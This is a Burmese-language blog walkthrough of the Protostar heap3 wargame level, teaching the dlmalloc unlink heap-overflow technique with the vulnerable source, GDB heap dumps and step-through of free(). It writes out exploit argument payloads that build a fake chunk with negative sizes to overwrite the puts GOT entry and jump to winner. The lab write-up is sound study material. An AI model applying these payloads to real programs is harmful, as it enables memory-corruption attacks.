0x12 – Unlink

Once upon a free from phrack magazine

unlink ကိုေရာက္တဲ့အခ်ိန္မွာေတာ့ အရင္ထက္ပိုျပီးခက္လာတယ္ ဒါေၾကာင့္ ဒါေလးေတြလဲဖတ္ဖို႕လိုမယ္

https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/

Protostar က heap3 နဲ႕ေလ့လာမယ္။

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

void winner()
{
  printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  char *a, *b, *c;

  a = malloc(32);
  b = malloc(32);
  c = malloc(32);

  strcpy(a, argv[1]);
  strcpy(b, argv[2]);
  strcpy(c, argv[3]);

  free(c);
  free(b);
  free(a);

  printf("dynamite failed?\n");
}

ဒီမွာေတာ့ winner function ကို သြားေပးရမွာျဖစ္တယ္။ UAF နဲ႕မတူတာကေတာ့ free လုပ္ျပီးျပန္မသံုးတာပါ။ ဒီေတာ့ UAF ကိုလုပ္တဲ့နည္းနဲ႕အဆင္မေျပေတာ့ဘူးေပါ့ ။

Run ၾကည့္လိုက္မယ္။

$ ./heap3 aaa bbb ccc
dynamite failed?

GDB နဲ႕ debug လုပ္မယ္။

malloc လုပ္ထားတဲ့ ေပၚကို input ကို strcpy လုပ္တဲ့ထိ run လိုက္မယ္။

(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804890a <main+129>:   mov    eax,DWORD PTR [esp+0x1c]
0x804890e <main+133>:   mov    DWORD PTR [esp],eax
0x8048911 <main+136>:   call   0x8049824 <free>
24      in heap3/heap3.c

ပံုေလးနဲ႕ၾကည့္မယ္

ဆက္ run ရင္ free လုပ္မွာျဖစ္တယ္။ Ok run ၾကည့္မယ္။

0x804c000:      0x00000000      0x00000029      0x0804c028      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x0804c050      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x00000000      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804892e <main+165>:   mov    DWORD PTR [esp],0x804ac27
0x8048935 <main+172>:   call   0x8048790 <puts@plt>
0x804893a <main+177>:   leave
28      in heap3/heap3.c

ပံုေလးနဲ႕ၾကည့္မယ္

FD ေတြကိုေတြ႕ရပါတယ္။ ဒီေတာ့ က်ေနာ္တို႕ Input ကို ၁၀ လံုးေလာက္ထိထည့္လိုက္မယ္။ ျပီးရင္ free လုပ္ျပီးတဲ့အခ်ိန္ထိထားလိုက္မယ္။

(gdb) run AAAAAAAAAA BBBBBBBBBB CCCCCCCCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap3 AAAAAAAAAA BBBBBBBBBB CCCCCCCCCC
0x804c000:      0x00000000      0x00000029      0x0804c028      0x41414141
0x804c010:      0x00004141      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x0804c050      0x42424242      0x00004242      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x00000000      0x43434343
0x804c060:      0x00004343      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048935 <main+172>:   call   0x8048790 <puts@plt>
0x804893a <main+177>:   leave

Breakpoint 2, 0x08048935 in main (argc=4, argv=0xbffffd44) at heap3/heap3.c:28
28      in heap3/heap3.c

ဒါကို စဥ္းစားခဲ့တဲ့သူေတာ့မသိဘူး ။ က်ေနာ္ေတာ့ သူမ်ားလုပ္ျပတာေတာင္ ေတာ္တ္ာေလးျမင္ေအာင္ၾကည့္ရတယ္။ အရမ္းစိတ္ဝင္စားဖို႕ေကာင္းပါတယ္။ Program ဟာ user input ကိုထည့္ျပီးေတာ့မွာ heap ကို free ျပန္လုပ္တာကိုက်ေနာ္တို႕သိထားတယ္။ ဘယ္ကစလုပ္တာလဲဆိုရင္ free(c) ျဖစ္တဲ့အတြက္ ေနာက္ဆံုး chunk ကို စလုပ္တာေပါ့။ unlink ရဲ႕ အဓိက exploit လုပ္သြားတာကလဲ အဲဒါပဲျဖစ္ပါတယ္။ ေနာက္ဆံုး chunk ရဲ႕ေနာက္မွာ က်ေနာ္တို႕က fake chunk အေနနဲ႕ တစ္ခုထပ္ထည့္ေပးရမွာျဖစ္ပါတယ္။

ဒါေၾကာင္ free လုပ္တဲ့အခါမွာ next chunk ကို ၾကည့္တယ္။ next chunk က in use မဟုတ္ဘူးဆိုရင္ unlink လုပ္မွာျဖစ္တယ္။

Image captured from here

unlink ဆိုတာကေတာ့ chunk size က previous size နဲ႕ ေနာက္ထပ္ chunk တစ္ခုမွာတူေနမယ္ဆိုရင္ “corrupted size vs prev_size” ဆိုတဲ့ error တက္မယ္။ ေနာက္တစ္ခုလဲ error ။ ဒါဆိုရင္ ေနာက္ဆံုးတစ္ခုေပါ့။

လက္ေတြ႕စမ္းတာအဆင္ေျပမယ္။

ပထဆံုး Third Chunk ကို size 100 ျဖစ္ေအာင္ overflow လုပ္မယ္။

run AAAAAAAAAA `python -c 'print "B"*36+"\x65"'` CCCCCCCCCC

Heap result

0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x00004141      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000065      0x43434343      0x43434343
0x804c060:      0x00004343      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000

chunk size ကို 0x29 ကေန 0x65 အျဖစ္လုပ္လိုက္ျပီ။

Ok chunk data ကို C ေတြပဲထည့္မယ္

0x804c054+0x65 = 0x804c0b9

အဲ့ဒီကိုေရာက္တဲထိ overwrite မယ္။

run AAAAAAAAAA `python -c 'print "B"*36+"\x65"'` `python -c 'print "C"*96'`

Heap result

0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x00004141      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000065      0x43434343      0x43434343
0x804c060:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c070:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c080:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c090:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0a0:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0b0:      0x43434343      0x43434343      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000

ဟုတ္ျပီ အခုမွ unlink လုပ္ဖို႕လာတာ fakechunk တစ္ခုလုပ္ရမယ္။ fakechunk က Nullbyte ေတြပါလို႕မရဘူး ။

Vudo Malloc Trick from phrack

0xfffffffc = -4

negative value ကို ထည့္မွာျဖစ္တယ္။ chunk size ကို negative value ထည့္လိုက္ျခင္းအားျဖင့္ သူ႕အေရွ႕က previous chunk ကို ျပန္ၾကည့္တယ္။ -4 ကိုပဲျပန္ထည့္ထားတယ္။

in use ဟုတ္မဟုတ္ algorithm က ဘယ္လို check သလဲဆိုရင္ last bit ကိုၾကည့္တာျဖစ္တယ္။ 0 ဆိုရင္ not in use , 1 ဆိုရင္ေတာ့ in use

1100 ဆိုေတာ့ not in use ေပါ့ ။ ဒါဆိုရင္ unlink လုပ္ျပီ။

P->bk->fd

unlink က next chunk ရဲ႕ ေနာက္ထပ္ ၂ ခုမွာ backward pointer နဲ႕ forward pointer ကိုယူတာျဖစ္တယ္။

ဒီေနရာမွာက်ေနာ္တို႕က GOT ကို overwrite လုပ္ေပးရမွာျဖစ္တယ္။ forward pointer အေနနဲ႕ Heap ကိုထည့္မယ္။ Backward pointer အေနနဲ႕ GOT ကို overwrite မယ္။

စမ္းၾကည့္မယ္။

(gdb) disas 0x8048790
Dump of assembler code for function puts@plt:
0x08048790 <puts@plt+0>:        jmp    DWORD PTR ds:0x804b128
0x08048796 <puts@plt+6>:        push   0x68
0x0804879b <puts@plt+11>:       jmp    0x80486b0
End of assembler dump.
(gdb) x 0x804b128-12
0x804b11c <_GLOBAL_OFFSET_TABLE_+52>:   xchg   WORD PTR [eax+ecx*1],ax

12 bytes နွဳတ္လိုက္တာေတြ႕မယ္ထင္ပါတယ္။ ဘာလို႕လဲဆိုရင္ unlink က fd->bk=BK အေနနဲ႕ လုပ္တဲ့အခါမွာ BK က chunk ရဲ႕ 12 bytes ျပီးမွလာတာျဖစ္လို႕ပါ။ အဲဒါသိျပီးသားျဖစ္တယ္ေနာ္။ previous 4 + size 4 + fd 4 + BK

ေလာေလာဆယ္ ဒါရျပီ

run AAAAAAAAAA `python -c 'print "B"*36+"\x65"'` `python -c 'print "C"*96+"\xfc\xff\xff\xff\xfc\xff\xff\xff\x1c\xb1\x04\x08"'`

ဒါကို Heap ေပၚျပန္သြားေစခ်င္တာျဖစ္တဲ့အတြက္ heap address က bk ေနရမွာထည့္ရမယ္

(gdb) run `python -c 'print "\x68\x64\x88\x04\x08\xC3"'` `python -c 'print "B"*36+"\x65"'` `python -c 'print "C"*96+"\xfc\xff\xff\xff\xfc\xff\xff\xff\x1c\xb1\x04\x08\x08\xc0\x04\x08"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap3 `python -c 'print "\x68\x64\x88\x04\x08\xC3"'` `python -c 'print "B"*36+"\x65"'` `python -c 'print "C"*96+"\xfc\xff\xff\xff\xfc\xff\xff\xff\x1c\xb1\x04\x08\x08\xc0\x04\x08"'`
0x804c000:      0x00000000      0x00000029      0x04886468      0x0000c308
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000065      0x43434343      0x43434343
0x804c060:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c070:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c080:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c090:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0a0:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0b0:      0x43434343      0x43434343      0xfffffffc      0xfffffffc
0x804c0c0:      0x0804b11c      0x0804c008      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]

Breakpoint 3, 0x08048911 in main (argc=4, argv=0xbffffcd4) at heap3/heap3.c:24
---Type <return> to continue, or q <return> to quit---
24      in heap3/heap3.c


(gdb) ni
0x804c000:      0x00000000      0x00000029      0x04886468      0x0000c308
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000065      0x0804b194      0x0804b194
0x804c060:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c070:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c080:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c090:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0a0:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0b0:      0x43434343      0x00000064      0xfffffffc      0xfffffffc
0x804c0c0:      0x0804b11c      0x0804c008      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0x804891a <main+145>:   mov    DWORD PTR [esp],eax
25      in heap3/heap3.c

This line changed
0x804c050:      0x42424242      0x00000065      0x0804b194      0x0804b194


(gdb) ni
0x804c000:      0x00000000      0x00000029      0x04886468      0x0000c308
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c040:      0x42424242      0x42424242      0x42424242      0x42424242
0x804c050:      0x42424242      0x00000065      0x0804b194      0x0804b194
0x804c060:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c070:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c080:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c090:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0a0:      0x43434343      0x43434343      0x43434343      0x43434343
0x804c0b0:      0x43434343      0x00000064      0xfffffffc      0xfffffffc
0x804c0c0:      0x0804b11c      0x0804c008      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804891a <main+145>:   mov    DWORD PTR [esp],eax
0x804891d <main+148>:   call   0x8049824 <free>
0x0804891a      25      in heap3/heap3.c

also changed this line

0x804c0b0:      0x43434343      0x00000064      0xfffffffc      0xfffffffc

No no ! မရဘူး 🙁

တိုင္ပတ္တာကေတာ့ သူမ်ားျပတဲ့နည္းနဲ႕မရရင္ မလုပ္တတ္ေတာ့တာပဲ ။ ေသခ်ာတာကေတာ့ Stack တုန္းကေလာက္နားမလည္ေသးတာေသခ်ာျပီ။ ဒီေတာ့ ထပ္ျပီးနားလည္ေအာင္လုပ္ရေတာ့မွာေပါ့။

Revisitng Heap

free အစမွာ break မယ္

(gdb) break *0x08048911
Breakpoint 2 at 0x8048911: file heap3/heap3.c, line 24.

run မယ္

(gdb) run AAAA BBBB CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA BBBB CCCC
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd54) at heap3/heap3.c:24
24      in heap3/heap3.c

အိုေက အခု free စလုပ္ေတာ့မယ္။ ni နဲ႕မသြားေတာ့ဘူး si နဲ႕သြားမယ္ free ကိုပါနားလည္ေအာင္ၾကည့္ေတာ့မယ္။

Hook ကိုပါျပန္ေျပာင္းလိုက္မယ္။ Stack ေတြ registers ေတြပါၾကည့္မယ္

(gdb) define hook-stop
Redefine command "hook-stop"? (y or n) y
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/56wx 0x804c000
>x/2i $eip
>x/32wx $esp
>i r eax ebx ecx edx
>end

စမယ္

(gdb) run AAAA BBBB CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 AAAA BBBB CCCC
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    eax,DWORD PTR [esp+0x18]
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
0xbffffcb0:     0x00000004      0xbffffd54      0xbffffd68      0xb7fe1848
0xbffffcc0:     0xbffffd10      0xffffffff      0xb7ffeff4      0x08048576
0xbffffcd0:     0x00000001      0xbffffd10      0xb7ff0626      0xb7fffab0
0xbffffce0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcf0:     0xbffffd28      0x30752f63      0x1a343973      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5

Breakpoint 2, 0x08048911 in main (argc=4, argv=0xbffffd54) at heap3/heap3.c:24
24      heap3/heap3.c: No such file or directory.
        in heap3/heap3.c

free ကိုေခၚမယ္

(gdb) si
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049824 <free>:       push   ebp
0x8049825 <free+1>:     mov    ebp,esp
0xbffffc7c:     0x08048916      0x0804c058      0xbffffe91      0x0804ab50
0xbffffc8c:     0xbffffca8      0xb7ec6365      0x0804c008      0x0804c030
0xbffffc9c:     0x0804c058      0x0804ab50      0x00000000      0xbffffd28
0xbffffcac:     0xb7eadc76      0x00000004      0xbffffd54      0xbffffd68
0xbffffcbc:     0xb7fe1848      0xbffffd10      0xffffffff      0xb7ffeff4
0xbffffccc:     0x08048576      0x00000001      0xbffffd10      0xb7ff0626
0xbffffcdc:     0xb7fffab0      0xb7fe1b28      0xb7fd7ff4      0x00000000
0xbffffcec:     0x00000000      0xbffffd28      0x30752f63      0x1a343973
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
free (mem=0x804c058) at common/malloc.c:3583
3583    common/malloc.c: No such file or directory.
        in common/malloc.c

result အရ free function က stack frame ေဆာက္ေတာ့မယ္ frame ေဆာက္တဲ့ထိ run လိုက္မယ္

(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804982a <free+6>:     mov    DWORD PTR [ebp-0x38],0x804b160
0x8049831 <free+13>:    cmp    DWORD PTR [ebp+0x8],0x0
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x00000001      0x0804848c      0x0804b118      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
3583    in common/malloc.c

အခုလာမွာက mov DWORD PTR [ebp-0x38],0x804b160

အဲဒါဘာေတြလဲ

(gdb) x $ebp-0x38
0xbffffc40:     0x00000001
(gdb) x 0x804b160
0x804b160 <av_>:        0x00000049

function av_ ဘာၾကီးလဲ

http://www.gnu.org/software/libffcall/avcall.html

ဟုတ္ျပီ သူက function တစ္ခုကိုလွမ္းေခၚတာ ။ ok ေနာက္တစ္ေၾကာင္းထပ္ၾကည့္မယ္

0x8049831 <free+13>:    cmp    DWORD PTR [ebp+0x8],0x0
(gdb) x $ebp+0x8
0xbffffc80:     0x0804c058
(gdb) x 0x0804c058
0x804c058:      0x43434343

ဒီေတာ့ Heap ေပၚက C ကိုလွမ္းၾကည့္တာေပါ့ 0 နဲ႕တူလားမတူလား ။ ဆက္ run မယ္

0x8049835 <free+17>:    je     0x8049a89 <free+613>

တကယ္လို႕ညီရင္ free+613 ကိုသြားမယ္ ဘာလဲအဲဒါ

0x08049a89 <free+613>:  leave

leave မွာ၊ အိုေက ခုဟာကမညီဘူးဆိုေတာ့ အဲ့ကိုမသြားဘူး

0x804983b <free+23>:    mov    eax,DWORD PTR [ebp+0x8]

heap address ကို eax ထဲထည့္မယ္

(gdb) si
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804983e <free+26>:    sub    eax,0x8
0x8049841 <free+29>:    mov    DWORD PTR [ebp-0x34],eax
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x0804b160      0x0804848c      0x0804b118      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
0x0804983e      3598    in common/malloc.c

ဒါျပီးရင္ eax ကို 0x8 နွုတ္မယ္

eax            0x804c050        134529104

ျပီးရင္ လုပ္မွာက

0x8049841 <free+29>:    mov    DWORD PTR [ebp-0x34],eax

အဲဒီ eax ကို ebp-0x34 ထဲထည့္မယ္။

(gdb) si
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c050:      0x00000000      0x00000029      0x43434343      0x00000000
0x804c060:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8049844 <free+32>:    mov    eax,DWORD PTR [ebp-0x34]
0x8049847 <free+35>:    mov    eax,DWORD PTR [eax+0x4]
0xbffffc30:     0xb7fe1b28      0x00000001      0x00000001      0x00000000
0xbffffc40:     0x0804b160      0x0804c050      0x0804b118      0x00000000
0xbffffc50:     0xb7e9b3f4      0xb7fd7ff4      0x00000000      0x00000000
0xbffffc60:     0xbffffca8      0xb7ff6210      0x00000f89      0xb7f09de0
0xbffffc70:     0x00000000      0x00000000      0xbffffca8      0x08048916
0xbffffc80:     0x0804c058      0xbffffe91      0x0804ab50      0xbffffca8
0xbffffc90:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffca0:     0x0804ab50      0x00000000      0xbffffd28      0xb7eadc76
eax            0x804c050        134529104
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x5      5
3599    in common/malloc.c

eax ထဲကေန stack ထဲသြားျပန္သိမ္းလိုက္တာေပါ့ ။ ျပီးေတာ့

0x8049844 <free+32>:    mov    eax,DWORD PTR [ebp-0x34]

ok eax ထဲကို ေနာက္ထပ္ တစ္ခုထည့္ခ်င္တာလား ၊ မဟုတ္ဘူး ဒါပဲျပန္ထည့္တာ 😀

(gdb) x $ebp-0x34
0xbffffc44:     0x0804c050

ေနာက္တစ္ေၾကာင္း

0x8049847 <free+35>:    mov    eax,DWORD PTR [eax+0x4]

eax ကို 4 ေပါင္းမယ္။ သိျပီ အဲဒါက chunk size ေပါ့ ။

(gdb) si
0x804c000:      0x00000000      0x00000029      0x41414141      0x00000000
0x804c010:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x42424242      0x00000000      0x00000000      0x00000000
0x804c040:      0x00000000      0x00000000      0x00000000      0x00000000
